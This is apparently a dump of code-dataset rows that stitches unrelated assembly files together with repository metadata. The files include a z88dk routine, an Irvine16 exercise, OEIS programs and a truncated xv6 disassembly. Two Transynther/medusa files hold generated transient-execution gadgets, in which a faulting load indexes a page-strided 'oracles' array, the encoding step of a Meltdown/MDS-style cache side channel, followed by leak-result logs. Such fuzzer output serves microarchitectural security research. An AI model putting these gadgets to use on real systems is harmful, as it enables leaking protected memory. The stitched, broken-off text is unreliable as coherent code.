36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36
*/
| 56.026316 | 2,999 | 0.65923 |
11c2f8a1ec53828b87f4877d65fcd6c1a7cbb3b1 | 7,638 | asm | Assembly | Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xca.log_21829_1306.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xca.log_21829_1306.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xca.log_21829_1306.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r14
push %rbp
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0x11668, %r14
nop
nop
nop
cmp %rbx, %rbx
mov (%r14), %r10w
nop
cmp $63975, %r10
lea addresses_WT_ht+0x1e268, %r10
nop
nop
and $22414, %rdi
movb (%r10), %r12b
nop
nop
sub %rbx, %rbx
lea addresses_WC_ht+0xae68, %rsi
lea addresses_normal_ht+0xdca8, %rdi
and %r12, %r12
mov $121, %rcx
rep movsw
nop
nop
nop
nop
nop
sub %r10, %r10
lea addresses_WT_ht+0x1c268, %rsi
lea addresses_WT_ht+0x14e38, %rdi
nop
nop
nop
add %rbp, %rbp
mov $21, %rcx
rep movsl
sub $40288, %r14
lea addresses_WT_ht+0xa268, %r12
clflush (%r12)
nop
nop
nop
lfence
mov (%r12), %rbx
nop
nop
xor $27901, %r12
lea addresses_UC_ht+0x17c68, %rsi
add $60900, %rdi
movl $0x61626364, (%rsi)
nop
nop
nop
nop
nop
sub $37558, %r10
lea addresses_UC_ht+0xb928, %rbp
nop
nop
and $2802, %r10
movw $0x6162, (%rbp)
nop
nop
nop
dec %r10
lea addresses_WC_ht+0xca68, %rcx
nop
nop
nop
nop
nop
add %rdi, %rdi
mov (%rcx), %esi
and %rdi, %rdi
lea addresses_UC_ht+0x268, %rdi
nop
and $10072, %rsi
movb (%rdi), %bl
nop
nop
nop
nop
nop
and $48666, %rcx
lea addresses_UC_ht+0x9ab0, %rbp
nop
nop
nop
nop
cmp %rbx, %rbx
movb (%rbp), %r10b
nop
nop
cmp %r14, %r14
lea addresses_D_ht+0x6e68, %rsi
lea addresses_normal_ht+0xb318, %rdi
nop
and $6812, %rbx
mov $98, %rcx
rep movsq
nop
sub %r12, %r12
lea addresses_WT_ht+0x2e68, %rcx
nop
nop
nop
nop
dec %rdi
vmovups (%rcx), %ymm5
vextracti128 $0, %ymm5, %xmm5
vpextrq $1, %xmm5, %rsi
nop
nop
xor $18434, %rsi
lea addresses_UC_ht+0x15268, %r14
nop
nop
nop
nop
nop
sub %rcx, %rcx
movups (%r14), %xmm2
vpextrq $1, %xmm2, %rdi
nop
nop
lfence
lea addresses_normal_ht+0xfaa8, %r12
nop
nop
nop
nop
add $56261, %r14
mov $0x6162636465666768, %rcx
movq %rcx, (%r12)
nop
nop
nop
nop
nop
dec %rsi
lea addresses_A_ht+0x11f0, %rsi
lea addresses_WT_ht+0x1e268, %rdi
nop
nop
add $59232, %r10
mov $19, %rcx
rep movsq
nop
nop
nop
add $47574, %r10
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %rbp
pop %r14
pop %r12
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r14
push %r8
push %rax
push %rcx
push %rdx
// Faulty Load
lea addresses_UC+0xa68, %rdx
inc %rcx
mov (%rdx), %ax
lea oracles, %r14
and $0xff, %rax
shlq $12, %rax
mov (%r14,%rax,1), %rax
pop %rdx
pop %rcx
pop %rax
pop %r8
pop %r14
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'size': 2, 'NT': False, 'type': 'addresses_UC', 'same': False, 'AVXalign': False, 'congruent': 0}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'size': 2, 'NT': False, 'type': 'addresses_UC', 'same': True, 'AVXalign': False, 'congruent': 0}}
<gen_prepare_buffer>
{'OP': 'LOAD', 'src': {'size': 2, 'NT': False, 'type': 'addresses_WT_ht', 'same': False, 'AVXalign': False, 'congruent': 10}}
{'OP': 'LOAD', 'src': {'size': 1, 'NT': False, 'type': 'addresses_WT_ht', 'same': False, 'AVXalign': False, 'congruent': 11}}
{'OP': 'REPM', 'src': {'same': True, 'type': 'addresses_WC_ht', 'congruent': 9}, 'dst': {'same': True, 'type': 'addresses_normal_ht', 'congruent': 5}}
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_WT_ht', 'congruent': 8}, 'dst': {'same': False, 'type': 'addresses_WT_ht', 'congruent': 3}}
{'OP': 'LOAD', 'src': {'size': 8, 'NT': False, 'type': 'addresses_WT_ht', 'same': False, 'AVXalign': False, 'congruent': 11}}
{'OP': 'STOR', 'dst': {'size': 4, 'NT': False, 'type': 'addresses_UC_ht', 'same': False, 'AVXalign': False, 'congruent': 9}}
{'OP': 'STOR', 'dst': {'size': 2, 'NT': False, 'type': 'addresses_UC_ht', 'same': False, 'AVXalign': False, 'congruent': 4}}
{'OP': 'LOAD', 'src': {'size': 4, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 8}}
{'OP': 'LOAD', 'src': {'size': 1, 'NT': False, 'type': 'addresses_UC_ht', 'same': False, 'AVXalign': False, 'congruent': 9}}
{'OP': 'LOAD', 'src': {'size': 1, 'NT': False, 'type': 'addresses_UC_ht', 'same': False, 'AVXalign': False, 'congruent': 3}}
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_D_ht', 'congruent': 9}, 'dst': {'same': False, 'type': 'addresses_normal_ht', 'congruent': 4}}
{'OP': 'LOAD', 'src': {'size': 32, 'NT': False, 'type': 'addresses_WT_ht', 'same': False, 'AVXalign': False, 'congruent': 10}}
{'OP': 'LOAD', 'src': {'size': 16, 'NT': False, 'type': 'addresses_UC_ht', 'same': False, 'AVXalign': False, 'congruent': 9}}
{'OP': 'STOR', 'dst': {'size': 8, 'NT': False, 'type': 'addresses_normal_ht', 'same': False, 'AVXalign': False, 'congruent': 1}}
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_A_ht', 'congruent': 0}, 'dst': {'same': False, 'type': 'addresses_WT_ht', 'congruent': 11}}
{'00': 21829}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
| 34.561086 | 2,999 | 0.656716 |
c3838416c254518c2253cfb9f4b3344ac3fcd7b6 | 140 | asm | Assembly | libsrc/_DEVELOPMENT/arch/zx/display/c/sccz80/zx_saddr2py.asm | meesokim/z88dk | 5763c7778f19a71d936b3200374059d267066bb2 | [
"ClArtistic"
] | null | null | null | libsrc/_DEVELOPMENT/arch/zx/display/c/sccz80/zx_saddr2py.asm | meesokim/z88dk | 5763c7778f19a71d936b3200374059d267066bb2 | [
"ClArtistic"
] | null | null | null | libsrc/_DEVELOPMENT/arch/zx/display/c/sccz80/zx_saddr2py.asm | meesokim/z88dk | 5763c7778f19a71d936b3200374059d267066bb2 | [
"ClArtistic"
] | null | null | null |
; uint zx_saddr2py(void *saddr)
SECTION code_arch
PUBLIC zx_saddr2py
zx_saddr2py:
INCLUDE "arch/zx/display/z80/asm_zx_saddr2py.asm"
| 12.727273 | 52 | 0.778571 |
a19a36e3d8558fb619e6f6bc17af6fb1f0a8bd4c | 9,763 | asm | Assembly | Transynther/x86/_processed/AVXALIGN/_ht_zr_/i3-7100_9_0xca_notsx.log_21829_910.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/AVXALIGN/_ht_zr_/i3-7100_9_0xca_notsx.log_21829_910.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/AVXALIGN/_ht_zr_/i3-7100_9_0xca_notsx.log_21829_910.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r12
push %r13
push %r8
push %r9
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0x15154, %r11
nop
nop
nop
nop
inc %r10
mov (%r11), %r8w
nop
xor $56510, %r12
lea addresses_WC_ht+0x18274, %r13
inc %r9
movb (%r13), %r12b
nop
nop
nop
sub %r11, %r11
lea addresses_UC_ht+0x10df4, %rsi
lea addresses_UC_ht+0x4214, %rdi
nop
cmp $54895, %r8
mov $121, %rcx
rep movsb
add $21862, %rcx
lea addresses_A_ht+0x134d4, %r9
nop
nop
add $21056, %rbp
movups (%r9), %xmm0
vpextrq $0, %xmm0, %r8
nop
nop
nop
nop
add %rcx, %rcx
lea addresses_normal_ht+0x9df4, %rsi
lea addresses_WT_ht+0x1a4e0, %rdi
nop
nop
nop
nop
cmp $43992, %r10
mov $36, %rcx
rep movsb
nop
nop
nop
xor $33865, %r8
lea addresses_WT_ht+0x3314, %rsi
lea addresses_D_ht+0xcbc5, %rdi
clflush (%rsi)
and %r11, %r11
mov $106, %rcx
rep movsw
dec %r9
lea addresses_WC_ht+0x13714, %rsi
lea addresses_WT_ht+0x2cae, %rdi
cmp $24098, %r12
mov $79, %rcx
rep movsl
nop
nop
nop
xor %rsi, %rsi
lea addresses_normal_ht+0x18d34, %rbp
and %rdi, %rdi
movb $0x61, (%rbp)
nop
nop
nop
nop
xor %r11, %r11
lea addresses_normal_ht+0x19398, %rsi
lea addresses_WC_ht+0x1314, %rdi
nop
nop
nop
nop
sub %r13, %r13
mov $40, %rcx
rep movsw
cmp %r12, %r12
lea addresses_WT_ht+0x1b314, %rsi
clflush (%rsi)
nop
nop
nop
nop
nop
sub $9967, %r8
movups (%rsi), %xmm4
vpextrq $0, %xmm4, %r11
nop
nop
nop
dec %r9
lea addresses_A_ht+0x6594, %r11
nop
nop
nop
nop
and $57198, %rcx
movb (%r11), %r10b
nop
add %rbp, %rbp
lea addresses_A_ht+0x12314, %rbp
nop
nop
sub %rdi, %rdi
mov $0x6162636465666768, %r12
movq %r12, %xmm1
vmovups %ymm1, (%rbp)
add %r8, %r8
lea addresses_WC_ht+0x18d14, %r13
nop
nop
xor %r8, %r8
movb $0x61, (%r13)
nop
dec %r13
lea addresses_WC_ht+0xd34d, %rdi
clflush (%rdi)
nop
nop
nop
nop
nop
xor $11409, %r13
mov $0x6162636465666768, %r11
movq %r11, %xmm0
vmovups %ymm0, (%rdi)
nop
nop
nop
nop
inc %rsi
lea addresses_normal_ht+0x7f14, %r13
nop
nop
cmp $42383, %rbp
mov $0x6162636465666768, %rcx
movq %rcx, (%r13)
nop
nop
nop
dec %r11
pop %rsi
pop %rdi
pop %rcx
pop %rbp
pop %r9
pop %r8
pop %r13
pop %r12
pop %r11
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r12
push %r13
push %r9
push %rax
push %rbp
push %rdx
// Load
lea addresses_D+0x17454, %rax
nop
cmp %rdx, %rdx
mov (%rax), %r11d
nop
dec %r9
// Store
lea addresses_WC+0x1ce54, %r11
nop
mfence
mov $0x5152535455565758, %rax
movq %rax, (%r11)
cmp %r11, %r11
// Store
lea addresses_normal+0xd654, %r13
nop
nop
nop
nop
sub %rax, %rax
mov $0x5152535455565758, %r12
movq %r12, %xmm6
movups %xmm6, (%r13)
cmp %r9, %r9
// Load
lea addresses_WC+0x9064, %r13
nop
nop
sub $56843, %rbp
mov (%r13), %r9w
nop
nop
nop
inc %r12
// Store
lea addresses_WC+0x1cdf0, %rdx
nop
nop
cmp %r12, %r12
movb $0x51, (%rdx)
nop
nop
nop
cmp $50754, %r11
// Load
lea addresses_RW+0x1f2c3, %r11
nop
nop
nop
xor %rax, %rax
mov (%r11), %rdx
nop
nop
nop
nop
nop
sub $41229, %r13
// Load
lea addresses_RW+0x15914, %rax
nop
sub $32435, %rbp
mov (%rax), %r13w
nop
nop
nop
and $61128, %r9
// Store
lea addresses_D+0x17808, %r11
inc %r9
mov $0x5152535455565758, %rbp
movq %rbp, %xmm4
vmovups %ymm4, (%r11)
nop
inc %rbp
// Faulty Load
lea addresses_WC+0x2f14, %r9
nop
dec %r11
vmovaps (%r9), %ymm5
vextracti128 $1, %ymm5, %xmm5
vpextrq $1, %xmm5, %rbp
lea oracles, %r13
and $0xff, %rbp
shlq $12, %rbp
mov (%r13,%rbp,1), %rbp
pop %rdx
pop %rbp
pop %rax
pop %r9
pop %r13
pop %r12
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'src': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_WC', 'size': 32, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 4, 'NT': False, 'type': 'addresses_D', 'size': 4, 'AVXalign': False}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 6, 'NT': False, 'type': 'addresses_WC', 'size': 8, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 3, 'NT': False, 'type': 'addresses_normal', 'size': 16, 'AVXalign': False}}
{'src': {'same': False, 'congruent': 4, 'NT': False, 'type': 'addresses_WC', 'size': 2, 'AVXalign': False}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 2, 'NT': False, 'type': 'addresses_WC', 'size': 1, 'AVXalign': True}}
{'src': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_RW', 'size': 8, 'AVXalign': True}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 9, 'NT': False, 'type': 'addresses_RW', 'size': 2, 'AVXalign': False}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_D', 'size': 32, 'AVXalign': False}}
[Faulty Load]
{'src': {'same': True, 'congruent': 0, 'NT': False, 'type': 'addresses_WC', 'size': 32, 'AVXalign': True}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'same': True, 'congruent': 6, 'NT': True, 'type': 'addresses_UC_ht', 'size': 2, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'same': True, 'congruent': 5, 'NT': False, 'type': 'addresses_WC_ht', 'size': 1, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_UC_ht', 'congruent': 5, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_UC_ht', 'congruent': 6, 'same': False}}
{'src': {'same': True, 'congruent': 6, 'NT': False, 'type': 'addresses_A_ht', 'size': 16, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_normal_ht', 'congruent': 4, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WT_ht', 'congruent': 2, 'same': False}}
{'src': {'type': 'addresses_WT_ht', 'congruent': 9, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_D_ht', 'congruent': 0, 'same': False}}
{'src': {'type': 'addresses_WC_ht', 'congruent': 9, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WT_ht', 'congruent': 0, 'same': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 2, 'NT': False, 'type': 'addresses_normal_ht', 'size': 1, 'AVXalign': False}}
{'src': {'type': 'addresses_normal_ht', 'congruent': 1, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WC_ht', 'congruent': 8, 'same': True}}
{'src': {'same': False, 'congruent': 9, 'NT': False, 'type': 'addresses_WT_ht', 'size': 16, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 7, 'NT': False, 'type': 'addresses_A_ht', 'size': 1, 'AVXalign': False}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 10, 'NT': False, 'type': 'addresses_A_ht', 'size': 32, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 8, 'NT': False, 'type': 'addresses_WC_ht', 'size': 1, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': True, 'congruent': 0, 'NT': False, 'type': 'addresses_WC_ht', 'size': 32, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 11, 'NT': False, 'type': 'addresses_normal_ht', 'size': 8, 'AVXalign': False}}
{'00': 21777, '49': 52}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
| 30.89557 | 2,999 | 0.651234 |
c2ead110baab3a7163f615f4a3deb739442b215f | 437 | asm | Assembly | Assembly/LP3/LP3.asm | IceNerd/hogwarts | df1f3e1a94688fd728f6b54653a36a47671293da | [
"Unlicense"
] | null | null | null | Assembly/LP3/LP3.asm | IceNerd/hogwarts | df1f3e1a94688fd728f6b54653a36a47671293da | [
"Unlicense"
] | null | null | null | Assembly/LP3/LP3.asm | IceNerd/hogwarts | df1f3e1a94688fd728f6b54653a36a47671293da | [
"Unlicense"
] | null | null | null | TITLE Flag (LP3.asm)
INCLUDE Irvine16.inc
mScroll MACRO lines, attribute, uplf_col, uplf_row, lort_col, lort_row
mov ah, 6
mov al, lines
IFNB<attribute>
mov bh, attribute
ELSE
mov bh, 7
ENDIF
mov ch, uplf_row
mov cl, uplf_col
mov dh, lort_row
mov dl, lort_col
int 10h
ENDM
.code
main PROC
mov ax, @data
mov ds, ax
call Clrscr
mScroll 0, 32, 0, 0, 20, 20
mov dh, 0
mov dl, 20
call Gotoxy
exit
main ENDP
END main | 12.852941 | 70 | 0.702517 |
702639289ddd4fd1abd0ee60e4d73b759d966e24 | 407 | asm | Assembly | oeis/112/A112456.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/112/A112456.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/112/A112456.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A112456: Least triangular number divisible by n-th prime.
; Submitted by Jon Maiga
; 6,3,10,21,55,78,136,171,253,406,465,666,820,903,1081,1378,1711,1830,2211,2485,2628,3081,3403,3916,4656,5050,5253,5671,5886,6328,8001,8515,9316,9591,11026,11325,12246,13203,13861,14878,15931,16290,18145,18528,19306
seq $0,40 ; The prime numbers.
bin $0,2
add $1,$0
mov $2,6
lpb $1
add $1,$0
mov $0,$2
trn $1,3
lpe
| 29.071429 | 215 | 0.719902 |
8bd0863a8b46c9135f25d4fa0396332aa26d8a92 | 142 | asm | Assembly | core/words/expandmacro.asm | paulscottrobson/nextForth | 3725af76cedd403e1e468fc8392e819fc0feb744 | [
"MIT"
] | 2 | 2019-02-17T02:39:13.000Z | 2020-06-10T09:57:22.000Z | core/words/expandmacro.asm | paulscottrobson/nextForth | 3725af76cedd403e1e468fc8392e819fc0feb744 | [
"MIT"
] | 1 | 2019-03-03T20:40:02.000Z | 2020-07-02T09:39:48.000Z | core/words/expandmacro.asm | paulscottrobson/nextForth | 3725af76cedd403e1e468fc8392e819fc0feb744 | [
"MIT"
] | null | null | null | ;
; Word: [expand.macro]
; Dictionary: ( - )
; Date: 1st February 2018
; Macro: No
; Notes:
;
__ExpandMacro:
jr __ExpandMacro | 14.2 | 28 | 0.591549 |
2d2a17900f0df306060ac18acc7751b50c47d3b6 | 40,552 | asm | Assembly | echo.asm | jhyunleehi/xv6-public | 85fb0f281dc198c571553a7f625919c66905de6e | [
"MIT-0"
] | null | null | null | echo.asm | jhyunleehi/xv6-public | 85fb0f281dc198c571553a7f625919c66905de6e | [
"MIT-0"
] | 2 | 2021-04-14T15:27:25.000Z | 2022-01-15T15:29:32.000Z | echo.asm | jhyunleehi/xv6-public | 85fb0f281dc198c571553a7f625919c66905de6e | [
"MIT-0"
] | null | null | null |
_echo: file format elf32-i386
Disassembly of section .text:
00000000 <main>:
#include "stat.h"
#include "user.h"
int
main(int argc, char *argv[])
{
0: f3 0f 1e fb endbr32
4: 8d 4c 24 04 lea 0x4(%esp),%ecx
8: 83 e4 f0 and $0xfffffff0,%esp
b: ff 71 fc pushl -0x4(%ecx)
e: 55 push %ebp
f: 89 e5 mov %esp,%ebp
11: 53 push %ebx
12: 51 push %ecx
13: 83 ec 10 sub $0x10,%esp
16: 89 cb mov %ecx,%ebx
int i;
for(i = 1; i < argc; i++)
18: c7 45 f4 01 00 00 00 movl $0x1,-0xc(%ebp)
1f: eb 3c jmp 5d <main+0x5d>
printf(1, "%s%s", argv[i], i+1 < argc ? " " : "\n");
21: 8b 45 f4 mov -0xc(%ebp),%eax
24: 83 c0 01 add $0x1,%eax
27: 39 03 cmp %eax,(%ebx)
29: 7e 07 jle 32 <main+0x32>
